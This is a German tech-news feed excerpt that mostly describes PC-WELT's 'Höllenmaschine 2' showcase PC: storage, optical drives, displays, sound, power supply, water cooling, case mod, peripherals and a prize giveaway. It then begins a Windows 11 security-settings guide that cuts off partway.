<p>Noch mehr Tempo kitzeln wir aus der Cheetah 15K.4, indem wir gleich vier der SAS-Laufwerke mittels der PCI-X-Controller-Karte <a href="https://web.archive.org/web/20070315054634/http:/www.adaptec.com/de-DE/products/sas/raid/SAS-4800/index.htm">Adaptec 4800SAS/128</a> zu einem Raid-10-Verbund koppeln. Zwei Laufwerke fungieren dabei als RAID-0-Verbund: Dadurch lässt sich im Idealfall die Datentransferrate fast verdoppeln, da der SAS-Controller den Datenstrom in kleine Pakete zerlegt (Striping), die er simultan auf das Plattenduo schreibt beziehungsweise davon liest. Um eine hundertprozentige Datensicherheit zu gewährleisten, arbeiten die beiden anderen SAS-Laufwerke im RAID-1-Modus und spiegeln so den Datenbestand des RAID-0-Verbundes.</p>



<p>Umsonst gibt’s die Datensicherheit allerdings nicht: Durch den RAID-10-Verbund halbiert sich die nutzbare Kapazität des Laufwerk-Quartetts auf knapp 300 GB. Damit Systemprogramme und Applikationen möglichst verzögerungsfrei starten und arbeiten, haben wir die Betriebssysteme sowie alle Programme und Benchmarks auf der SAS-Partition installiert.</p>



<p>Ausreichend Platz für umfangreiche Musik- und Video-Sammlungen gibt’s auf der zweiten Partition der Höllenmaschine 2: Sie besteht aus vier 750-GB-Laufwerken des Typs <a href="https://web.archive.org/web/20070315054351/http:/www.seagate.com/ww/v/index.jsp?locale=de-DE&amp;name=Barracuda_7200.10_SATA_750.3_GB&amp;vgnextoid=ea7bc4d44018e010VgnVCM100000dd04090aRCRD&amp;vgnextchannel=a32a2f290c5fb010VgnVCM100000dd04090aRCRD&amp;reqPage=Model">Seagate Barracuda 7200.10 ST3750640AS</a>, die wir ebenfalls zu einem Raid-10-Verbund gebündelt haben. Die Festplatten bieten dann zusammen eine formatierte Kapazität von knapp 1,4 Terabyte.</p>



<p>Die Barracuda 7200.10 setzt auf die SATA-II-Schnittstelle, die eine theoretische Transferrate von bis zu 300 MB/s erreicht. In der Praxis erzielen Sie diesen Wert zwar nicht, bei einem Raid-0-Verbund aus zwei Platten dürfen Sie aber durchschnittlich mit deutlich über 100 MB/s rechnen. Damit verwalten und archivieren Sie selbst große Videodateien sehr flott.</p>



<p>Die Seagate Barracuda 7200.10 ST3750640AS ist technisch auf der Höhe der Zeit: Das 3,5-Zoll-Laufwerk beherrscht die Technik Native Command Queuing (NCQ). NCQ erlaubt der Festplatte, die vom System geforderten Zugriffe selbstständig zu verwalten. Sie kann so die optimale Reihenfolge der Zugriffe ermitteln: Das spart zusätzliche Drehbewegungen, verkürzt damit die Wegstrecken, die der Schreib-/Lesekopf zurücklegen muss, und sorgt ergo für ein höheres Tempo. Eine höhere Datenübertragungsrate lässt sich auch mit <a href="https://web.archive.org/web/20070315054351/http:/www.pcwelt.de/tests/hardware-tests/festplatten/130042/index.html">Perpendicular Recording</a> erzielen, da die Datenbits nicht mehr horizontal, sondern vertikal auf dem Datenträger angeordnet sind. Auch diese moderne Technik setzt die Barracuda 7200.10 ein, was wir im <a href="https://web.archive.org/web/20070315054351/http:/www.pcwelt.de/tests/hardware-tests/festplatten/137452/">PC-WELT-Test</a> mit einer Innovations-Empfehlung belohnt haben.</p>



<h2 class="wp-block-heading toc">Mehr Mobilität: 750 GB externer Speicher und Allesleser</h2>



<p>Mit der <a href="https://web.archive.org/web/20070315054402/http:/www.seagate.com/www/de-de/products/external/pushbutton_backup/">Seagate Pushbutton External Hard Drive</a> stehen Ihnen zusätzlich 750 GB mobiler Speicher zur Verfügung. Das externe 3,5-Zoll-Laufwerk erstellt ein Backup bequem auf Knopfdruck – selbst umfangreiche Datenbestände lassen sich auf diese Weise sichern. Bei der Datensicherung unterstützt Sie die beiliegende Software Bounceback Express. Die native SATA-II-Festplatte mit der Modellbezeichnung <a href="https://web.archive.org/web/20070315054402/http:/www.seagate.com/ww/v/index.jsp?locale=de-DE&amp;name=null&amp;vgnextoid=900a04b0c488e010VgnVCM100000dd04090aRCRD&amp;vgnextchannel=c0fed21c2f32b010VgnVCM100000dd04090aRCRD&amp;reqPage=Model">ST3750640CB-RK</a> besitzt sowohl eine Firewire- als auch eine USB-2.0-High-Speed-Schnittstelle.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099a85a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Seagate-Pushbutton-External-Hard-Drive.jpg?quality=50&amp;strip=all" alt="Seagate Pushbutton External Hard Drive " class="wp-image-3182080" width="578" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Seagate </p></div>



<p>Die Seagate Pushbutton rotiert mit 7.200 Umdrehungen pro Minute, der Datenpuffer beträgt stattliche 16 MB. Auch dieses Seagate-Laufwerk realisiert die hohe Kapazität mithilfe der Technik Perpendicular Recording. Auf den vier Datenscheiben wuseln insgesamt acht Schreib-Lese-Köpfe mit einem kaum wahrnehmbaren Betriebsgeräusch.</p>



<p>Sie können aber auch jede beliebige Speicherkarte mit den Daten der Höllenmaschine II füttern, denn der integrierte Kartenleser kommt mit allen gängigen Formaten wie Compact Flash (Typ I und II), MagicGate Memory Stick (Duo, Pro, Pro Duo), Memory Stick (Duo, Pro, Pro Duo, Pro Ultra II, ROM, Select), Microdrive, Micro SD, Multimedia Karte (RS), Secure Digital (Mini) Karte und Smart Media Karte klar. Das integrierte Disketten-Laufwerk speichert zwar auch Daten, dient aber eher für knifflige BIOS-Updates und Betriebssysteminstallationen – sofern kein bootfähiger USB-Stick zur Hand ist oder die benötigten Daten nur auf Floppy vorliegen.</p>



<p>Sie können Ihre Daten aber auch mit dem Blu-Ray-Brenner Philips SPD7000BD speichern, der bei 2-fachem Schreibtempo knapp 9 MB/s über die SATA-Schnittstelle schaufelt und einen einlagigen 25-GB-BR-Rohling in gut 45 Minuten füllt. Das vom Online-Versender <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11731&amp;clickref=rss&amp;platform=dl&amp;ued=https://web.archive.org/web/20070315054615/http:/www.alternate.de/html/index.html">Alternate</a> zur Verfügung gestellte interne Laufwerk beschreibt aber auch CDs und DVDs. Der Pufferspeicher des SATA-Brenners beträgt 8 MB.</p>



<p>DVDs sowie CDs liest der Blu-Ray-Brenner mit maximal 16- beziehungsweise 32-facher Geschwindigkeit. DVD±Rs beschreibt das Laufwerk mit 12-fachem, DVD-RWs mit 8fachem und DVD+RWs mit 12-fachem Tempo. Dual-Layer-DVD‑Rs und Double-Layer-DVD+Rs brennt das interne Laufwerk mit 4-facher Geschwindigkeit. CD-Rs sowie CD-RWs beschreibt der Blu-Ray-Brenner mit 32‑fachem respektive 24‑fachem Tempo.</p>



<p>Im Lieferumfang des Blu-Ray-Laufwerks enthalten ist die Brenn-Software Nero 7 Essentials, eine abgespeckte Version von Nero 7 Premium mit folgenden, zum Teil funktionsreduzierten Programm-Modulen: Cover Designer 2, Express 7, Home, Incd 5, Media Home, Photoshow Express 4, Photosnap, Photosnap Viewer, Scout, Showtime 2, Start Smart 3, Toolkit sowie Vision 4. Von Cyberlink liegt ein Blu-Ray-Medium bei, auf dem sich das Abspielprogramm Power DVD BD befindet, mit dem Sie Filme auf Blu-Ray- und DVD-Medien abspielen können.</p>



<p>Beim zweiten optischen Laufwerk, dem Samsung SH-S182A, handelt es sich um einen Multiformat-DVD-Brenner, der auch das DVD-RAM-Format beherrscht. Außerdem unterstützt das SATA-Laufwerk die Lightscribe-Technik. Das interne Laufwerk beschreibt DVD±Rs mit 18-fachem, DVD-RWs mit 6fachem und DVD+RWs mit 8fachem Tempo. Dual-Layer-DVD‑Rs sowie Double-Layer-DVD+Rs brennt der Samsung SH-S182A mit 8-facher und DVD-RAMs mit 12-facher Geschwindigkeit.</p>



<h2 class="wp-block-heading toc">Bildschirme: 24-Zoll-TFT und 8-Zoll-Touchscreen</h2>



<p>Der integrierte 8-Zoll-LCD-Touchscreen Worcol VE-XVT-8, der auf ein Panasonic-Display setzt, ist normalerweise für den Einsatz im Auto gedacht. Die physikalische Auflösung des LCDs beträgt 800 x 600 Bildpunkte, maximal ist eine Auflösung von 1024 x 768 Pixeln möglich. Die Ansteuerung des Touchscreen-Sensor-Panels erfolgt über die USB-Schnittstelle. Der Touchscreen-Treiber unterstützt alle gängigen Betriebssysteme.</p>



<p>Laut Hersteller liegt der maximale Blickwinkel des Worcol VE-XVT-8 bei 150 Grad. Die Leuchtstärke gibt Panasonic mit 500cd/m² an. Das Kontrastverhältnis beträgt nach Angaben des Herstellers 350:1. Neben der D-Sub-Schnittstelle steht auch ein AV-Videoeingang zur Verfügung. Alle wichtigen Einstellungen wie Bildposition, Farbtemperatur und -tiefe, Helligkeit und Kontrast lassen sich stufenlos über die Bedienelemente auf der Vorderseite einstellen.</p>



<p>Für mehr Übersicht sorgt das 24-Zoll-Breitbild-TFT <a href="https://web.archive.org/web/20070315055016/http:/www.benq.de/products/LCD/?product=636">Benq FP241W</a>, das wir der Höllenmaschine zur Seite stellen. Die physikalische Auflösung des LCD-Bildschirms beträgt 1920 x 1200 Bildpunkte – damit stellt der Monitor selbst das HD-Format 1080p nativ dar. Die Auflösung reicht aber auch, um zwei DIN-A4-Seiten nebeneinander auf den Schirm zu bringen.</p>



<p>Reich gesegnet ist der Benq FP241W mit Schnittstellen: Pflicht für ein HD-Gerät ist natürlich der HDMI-Eingang, hoch aufgelöste Bildsignale empfängt der 24-Zöller aber auch über die DVI-D-Schnittstelle. Hinzu gesellen sich ein D-Sub-, ein S-Video-, ein Komponenten- und ein USB-Eingang. Praktisch: Der LCD fungiert auch als USB-Hub und stellt drei Ausgänge zur Verfügung.</p>



<p>Der Benq FP241W misst 564 x 567 x 248 Millimeter und bringt 10,6 Kilogramm auf die Waage. Laut Hersteller beträgt der Energieverbrauch im Betrieb 95 Watt. Die Reaktionszeit des Displays gibt Benq mit 6 Millisekunden an (grau zu grau). Die Helligkeit liegt nach Herstellerangaben bei 500cd/m² und das Kontrastverhältnis bei 1000:1. Den horizontalen und vertikalen Blickwinkel gibt Benq mit jeweils 178 Grad an. Unsere Bildschirm-Experten prüfen den 24-Zöller gerade, sodass wir Ihnen in Kürze einen ausführlichen Test präsentieren können.</p>



<h2 class="wp-block-heading toc">Sound: EAX 5 und kabelloser 5.1-Raumklang</h2>



<p>Für die akustische Untermalung ist bei der Höllenmaschine die <a href="https://web.archive.org/web/20070315054259/http:/www.creative.com/products/product.asp?category=1&amp;subcategory=208&amp;product=14000">Creative Sound Blaster X-Fi Fatality FPS</a> zuständig. Der mit 51 Millionen Transistoren sehr komplexe Soundchip erreicht eine maximale Samplingfrequenz von 192 kHz. Der Wavetable-Synthesizer beherrscht 128 Stimmen, 128 Instrumente und 10 Drumsets. Außerdem unterstützt der X-Fi-Chip den Standard EAX Advanced HD 5 nativ und beschleunigt entsprechend optimierte Spiele. Den Test der Creative X-Fi Xtreme Music, die den baugleichen Soundchip nutzt, finden Sie <a href="https://web.archive.org/web/20070315054259/http:/www.pcwelt.de/tests/hardware-tests/soundkarten/56503/index.html">hier</a> – unser Audio-Experte vergab für den analogen und digitalen Klang jeweils die Note „sehr gut“.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099b390"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Creative-Sound-Blaster-X-Fi-Fatality-FPS.jpg?quality=50&amp;strip=all" alt="Creative Sound Blaster X-Fi Fatality FPS" class="wp-image-3182073" width="792" height="472" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Creative </p></div>



<p>Damit Sie auch unter Vista EAX in vollen Zügen genießen können – Microsoft hat bekanntlich beim neuen Betriebssystem das Hardware Abstraction Layer (HAL) für Directsound und Directsound 3D entfernt –, hat Creative das Alchemy-Projekt gestartet. Wir sind daher zuversichtlich, dass der Glückspilz, der die PC-WELT Höllenmaschine 2 gewinnt, zum Liefertermin nicht mehr auf EAX-Raumklang unter Vista verzichten muss.</p>



<p>Die beiliegende Break-out-Box erlaubt den Zugriff auf die wichtigsten Schnittstellen via Front-Panel. Es stehen jeweils ein koaxialer und ein optischer SPDIF-Ein- und -Ausgang, zwei Cinch-Buchsen für den AUX-Eingang, ein Mini-MIDI-Ein- und -Ausgang sowie eine Kopfhörerbuchse mit Lautstärkeregler und ein kombinierter analoger Line-/Mikrofon-Eingang bereit. Das Sound-Paket komplettiert eine Fernbedienung.</p>



<p>Ebenfalls von Creative stammt das THX-zertifizierte 5.1-Lautsprecher-Set <a href="https://web.archive.org/web/20070315054259/http:/www.creative.com/products/product.asp?category=4&amp;subcategory=25&amp;product=14661">Gigaworks Progamer G550W</a>. Das Boxenset mit Funkübertragung zu den hinteren Lautsprechern liefert 36 Watt <a href="https://web.archive.org/web/20070315054259/http:/de.wikipedia.org/wiki/RMS-Leistung">RMS</a> pro Kanal zu den Satelliten, die Subwoofer-Leistung gibt Creative mit 130 Watt RMS an. Im Transmitter der Gigaworks Progamer G550W sind die Regler für die Lautstärkeverteilung, Bass, Treble und Volume untergebracht, ergänzt von einer Kopfhörer-Buchse und einem AUX-Eingang. Ebenfalls im Lieferumfang: eine Fernbedienung.</p>



<h2 class="wp-block-heading toc">Stromversorgung: 1000 Watt</h2>



<p>Umweltpolitisch nicht ganz korrekt, aber bitter notwendig für eine stabile Stromversorgung der Hochleistungs-Komponenten: das 1000-Watt-Netzteil <a href="https://web.archive.org/web/20070315053922/http:/h1124473.serverkompetenz.net/index.php?id=55&amp;cat=2&amp;subcat=7&amp;product=157">Enermax Galaxy EGA1000EWL</a>. Der Kraftprotz mit einem Kampfgewicht von 5,6 Kilogramm glänzt laut Hersteller mit mehreren Weltneuheiten: Dazu gehören unter anderem fünf 12-Volt-Leitungen und die Möglichkeit, bis zu 24 Laufwerke gleichzeitig anschließen zu können. Außerdem rühmt sich das Netzteil, die erste Triple-Quad-Unterstützung zu bieten, weshalb wir es als adäquaten Stromlieferanten für die Höllenmaschine II ausgewählt haben.</p>



<p>Wenn Sie unseren Superrechner als Server einsetzen wollen, werden Sie sich nicht nur über die Alarmfunktionen freuen, die den Netzteil-Status überwachen, sondern auch über die RAM-Kabel für Speicherbestückungen ab 32 GB. Eine gute Idee von Enermax ist auch die komplette Trennung der Prozessor-Stromversorgung von den restlichen Versorgungsleitungen. Die Kühlung des 1000-Watt-Kraftprotzes übernimmt übrigens ein leise arbeitender Doppellüfter, bestehend aus einem 135- und einem 80-Millimeter-Rotor.</p>



<h2 class="wp-block-heading toc">Wassergekühlt: CPUs, GPUs und Festplatten</h2>



<p>Bei der recht hohen Leistungsaufnahme – die exakten Verbrauchswerte liefern wir noch nach – ist für den stabilen Betrieb der Höllenmaschine 2 eine effiziente Kühlung der hitzigsten Komponenten unverzichtbar. Diese Aufgabe übernimmt eine Wasserkühlung, die wir aus Komponenten des Kühlungsspezialisten <a href="https://web.archive.org/web/20070315054545/http:/www.innovatek.de/">Innovatek</a> zusammengestellt haben. Gesamtwert: 1950 Euro.</p>



<p>Beginnen wir mit dem Prozessorkühler X-Flow Xeon aus vernickeltem Kupfer, der eine Bauhöhe von lediglich 18 Millimetern hat. Da einige Kondensatoren in unmittelbarer Nachbarschaft der CPU-Sockel die passgenaue Montage verhinderten, war eine komplette Modifikation der X-Flows für die Höllenmaschine notwendig. Die VGA-Kühler Cool-Matic G80-GTX/GTS leiten nicht nur die Abwärme der GPUs ab, sondern kühlen auch den Grafikspeicher, den Bridge-Chip sowie den Spannungswandler. Um die Kühlleistung zu verbessern, integriert Innovatek in die Cool-Matic G80-GTX/GTS einen speziellen Kupferkern.</p>



<p>Alle acht Festplatten wandern in den HDM L-Pro Festplattenkühler aus Aluminium, der sich aus einem Innen- und einem Außenrahmen zusammensetzt. Dabei sind die beiden Rahmen voneinander entkoppelt – das reduziert die Geräuschentwicklung. Selbstredend ist die HDM L-Pro für Laufwerke mit bis zu 15.000 Umdrehungen pro Minute ausgelegt. Die Festplattenkühler lassen sich zudem problemlos mit einem Temperaturfühler aufrüsten.</p>



<h2 class="wp-block-heading toc">Kühlsystem mit Hamstertränke</h2>



<p>Für einen gleichmäßigen Strom der Kühlflüssigkeit sorgt die 12-Volt-Pumpe HPPS Plus. Das gemeinsam von Innovatek und Eheim entwickelte Modell kennt zwei Betriebszustände: Im fast geräuschlosen Silent-Modus, in dem wir die HPPS Plus betreiben, beträgt die maximale Pumpleistung 2,05 Meter. Per Lötbrücke lässt sich der Power-Modus aktivieren, die Pumpleistung steigt dann auf stattliche vier Meter. Ein Mikroprozessor regelt die Drehzahl der HPPS Plus dynamisch, sodass jederzeit eine optimale Förderleistung gesichert ist.</p>



<p>Hamstertränke: Die scherzhafte Bezeichnung stammt von einem Kollegen, der sich noch nicht mit den Finessen eines Wasserkühlsystems befasst hat, in dem kein Ausgleichsbehälter fehlen darf. Das von uns eingesetzte Modell Tank-O-Matic hat einen Durchmesser von 50 Millimetern, die Bauhöhe beträgt 280 Millimeter und das Fassungsvermögen 280 Milliliter.</p>



<p>Das zentrale Kühlsystem komplettiert der Blackice Triple Radiator. Seine drei 120-Millimeter-Lüfter leiten die Abwärme der Prozessoren, Grafikkarten und der acht Festplatten fast lautlos nach außen. Unser Casemodding-Experte „Fastbrain1“, der das exklusive Design-Gehäuse der Höllenmaschine 2 entworfen und gebaut hat, konnte nicht widerstehen und hat den Blackice mit stark reflektierendem Silberlack veredelt.</p>



<p>Kleinteile: Insgesamt fast fünf Meter des PVC-Spezialschlauchs von Innovatek sind in der Höllenmaschine 2 verbaut. Dazu gesellen sich – unter anderem – 28 1/8-Winkelverbinder und 8 gewinkelte 1/8-Einschraubverschraubungen. An kritischen Stellen verhindern diverse Knickschutzfedern, dass der Spezialschlauch abknickt und der Supergau einer Wasserkühlung eintritt: der Stau des Kühlmittelflusses. Nicht zu vergessen: Die Durchfluss-Messturbine Flowmeter PRO Rev 3.6, die das Durchflusstempo in Umdrehungen pro Minute an das Rechner-BIOS übermittelt. Zudem lässt sich die Durchflussgeschwindigkeit auch optisch mittels der integrierten blauen Indikator-LED kontrollieren.</p>



<h2 class="wp-block-heading toc">Gehäuse-Unikat: Casemod für 3600 Euro</h2>



<p>Für die Gestaltung des Gehäuses konnte die PC-WELT einen Spezialisten gewinnen: Heiko Polaczek, auch unter dem Alias „Fastbrain1“ bekannt, ist seit 14 Jahren eine feste Größe in der internationalen Casemoding-Szene. Der mehrfach für seine Gehäuse-Kunstwerke ausgezeichnete Modding-Profi verarbeitete für die Höllenmaschine 6,5 Quadratmeter Blech, 2,7 Meter Stahlrohr, 17 Meter Schweißdraht und zwei Liter blauen Porsche-Autolack. Letzteres lässt sich der schwäbische Sportwagenhersteller schon fast mit Gold aufwiegen: Der Liter kostet 450 Euro. Erwähnenswert sind an dieser Stelle noch die 27 laufenden Meter Schleifpapier und über den Daumen gepeilte 7,5 Kilogramm Spachtelmasse, die Fastbrain1 für das Gehäuse-Unikat verbrauchte.</p>



<p>Allein der Materialwert für den schmucken Casemod summiert sich auf knapp 3600 Euro, vom Arbeitsaufwand – circa 300 Stunden – ganz zu schweigen. Mehr Informationen und eine umfangreiche Bildgalerie mit den besten Werken von Heiko Polaczek finden Sie auf der Website. Wie Heiko Polaczek aus einem gähnend langweiligen Server-Tower unser exklusives Schmuckstück geformt hat, erfahren Sie in Kürze im Beitrag „Making of Höllenmaschine 2“.</p>



<h2 class="wp-block-heading toc">Peripherie: funktionell und elegant</h2>



<p>Das Beste ist gerade gut genug für unseren Superrechner – das gilt auch für die Eingabegeräte: Die drahtlose Bluetooth-Tastatur Logitech di Novo Edge besticht nicht nur durch ihr elegantes Design, sondern auch durch die hochwertige Verarbeitung. Über das integrierte Touchpad lassen sich Bildlauf-, Auswahl- und Zeigerfunktionen effizient nutzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099c259"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Logitech-di-Novo-Edge.jpg?quality=50&amp;strip=all" alt="Logitech di Novo Edge" class="wp-image-3182077" width="1024" height="669" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech </p></div>



<p>Dazu gesellt sich die Maus Logitech MX Revolution. Die ergonomisch geformte Funk-Maus setzt auf die präzise Laserabtastung und erlaubt laut Hersteller dank eines Tastenrads aus Leichtmetall besonders schnelle Bildläufe. Clevere Funktionen wie „One-Touch search“ und „Smartshift“ erleichtern die tägliche Arbeit.</p>



<p>Einer guten Tradition folgend verlosen wir – wie schon im letzten Jahr – den Porsche unter den PCs. Beteiligen Sie sich an unserer <a href="https://web.archive.org/web/20070315054320/http:/www.pcwelt.de/news/hardware/69505/index.html">Leserwahl</a> zum PCW3-Award: Wir suchen die beste Hard- und Software des Jahres 2006. Entscheiden Sie, welche Top-Produkte wir mit dem PCW3-Award auszeichnen. Sie nehmen dann automatisch an der Verlosung teil, bei der die Höllenmaschine als 1. Preis ausgesetzt ist. Oder Sie besuchen uns auf der <a href="https://web.archive.org/web/20070315054320/http:/files.messe.de/cmsdb/007/9036.swf">CeBIT 2007</a> (Halle 6, Stand C12), um den Super-PC in Aktion zu erleben. Dort haben Sie ebenfalls Gelegenheit, an der Verlosung teilzunehmen.<br>Garantieausschluss: Ansprüche gegen die IDG Magazine Media GmbH wegen Sach- und Rechtsmängeln an dem PC sowie dem TFT sind ausgeschlossen. Im Übrigen finden die für Schenkungen geltenden Vorschriften der §§ 521 bis 524 BGB Anwendung.</p>



<h2 class="wp-block-heading toc"> So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicher und schnell: Diese Windows-Einstellungen sollten Sie sofort anpassen]]></title>
<description><![CDATA[Nach der Installation von oder dem Upgrade auf Windows 11 sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit weni...]]></description>
<link>https://tsecurity.de/de/3653634/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653634/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</guid>
<pubDate>Wed, 08 Jul 2026 10:10:23 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nach der Installation von oder dem Upgrade auf <a href="https://software.pcwelt.de/offer/windows_11_home/43835?x-source=rss" target="_blank" rel="noreferrer noopener">Windows 11 </a>sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit wenigen Klicks die Sicherheit maximieren und das Betriebssystem verbessern.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Explorer anpassen</h2>



<p>Standardmäßig blendet Windows seit Jahren bekannte Dateiendungen aus. Das ist zunächst störend, weil Sie dadurch den korrekten Dateinamen nicht vollständig angezeigt kommen. Dazu kommt die Sicherheitsgefahr. So wird etwa die Datei “wichtiges-dokument.doc.exe” in diesem Fall als “wichtiges-dokument.doc! angezeigt, weil Windows einfach die Dateiendung “exe” ausblendet. </p>



<p>Aus einer ausführbaren Datei, etwa Malware/Ransomware, wird dadurch auf den ersten Blick ein unverdächtiges Worddokument. Das Problem können Sie schnell umgehen, indem Sie im Explorer auf “Anzeigen → Einblenden → Dateinamenerweiterungen” aktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da2003e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden.png" alt="Dateinamenerweiterungen" class="wp-image-2279514" width="847" height="603" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
